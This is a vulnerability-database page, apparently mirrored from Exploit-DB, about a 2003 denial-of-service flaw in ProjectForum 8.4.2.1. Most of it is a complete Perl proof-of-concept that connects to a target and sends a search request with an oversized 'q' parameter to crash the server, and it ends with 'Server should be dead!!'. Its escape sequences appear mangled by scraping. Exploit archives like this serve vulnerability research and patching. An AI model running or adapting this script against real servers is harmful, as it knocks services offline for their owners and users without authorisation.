ProjectForum 8.4.2.1 – Find Request Denial of Service

21次阅读
没有评论

ProjectForum 8.4.2.1 – Find Request Denial of Service

漏洞ID 1054322 漏洞类型
发布时间 2003-12-22 更新时间 2003-12-22
ProjectForum 8.4.2.1 - Find Request Denial of ServiceCVE编号 N/A
ProjectForum 8.4.2.1 - Find Request Denial of ServiceCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23460
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9271/info

It has been reported that ProjectForum may be prone to a denial of service vulnerability that may allow an attacker to cause the server to crash by sending an excessively long string via the 'find' request to the server.

ProjectForum versions 8.4.2.1 and prior have been reported to be prone to this issue. 

#!/usr/bin/perl -w

############################################################
#                                                          #
# ProjectForum 8.4.2.1 and below DoS Proof of Concept Code #
#  by Peter Winter-Smith [[email protected]]           #
#                                                          #
############################################################

use IO::Socket;

if(!($ARGV[1]))
{
print "nUsage: pfdos.pl <victim> <port>n" .
     "tdefault port is 3455nn";
exit;
}

$victim = IO::Socket::INET->new(Proto=>'tcp',
                              PeerAddr=>$ARGV[0],
                              PeerPort=>$ARGV[1])
                          or die "Unable to connect to $ARGV[0] " .
                                 "on port $ARGV[1]";

$DoSpacket = '' .
 'POST /1/Search HTTP/1.1' . "x0dx0a" .
 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, ' .
 'application/x-gsarcade-launch, application/vnd.ms-excel, ' .
 'application/vnd.ms-powerpoint, application/msword, ' .
 'application/x-shockwave-flash, */*' . "x0dx0a" .
 'Referer: http://localhost:3455/1/Search' . "x0dx0a" .
 'Accept-Language: en-gb..Content-Type: application/x-www-form-' .
 'urlencoded' . "x0dx0a" .
 'Accept-Encoding: gzip, deflate' . "x0dx0a" .
 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ' .
 'xxxxxxxxxxxxx' . "x20" .
 '1.0.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322)' . "x0dx0a" .
 'Host: localhost:3455' . "x0dx0a" .
 'Content-Length: 6306' . "x0dx0a" .
 'Connection: Keep-Alive' . "x0dx0a" .
 'Cache-Control: no-cache' . "x0dx0a" . "x0dx0a" .
 'q=' . 'a'x6292 . '&action=Find' . "x0dx0a";


print $victim $DoSpacket;

print " + Making Request ...n + Server should be dead!!n";

sleep(4);
close($victim);

print "Done.n";
exit;

相关推荐: NetBSD 1.x – ‘TalkD’ User Validation

NetBSD 1.x – ‘TalkD’ User Validation 漏洞ID 1053571 漏洞类型 发布时间 2002-04-03 更新时间 2002-04-03 CVE编号 N/A CNNVD-ID N/A 漏洞平台 NetBSD_x86 CVSS…

正文完
 0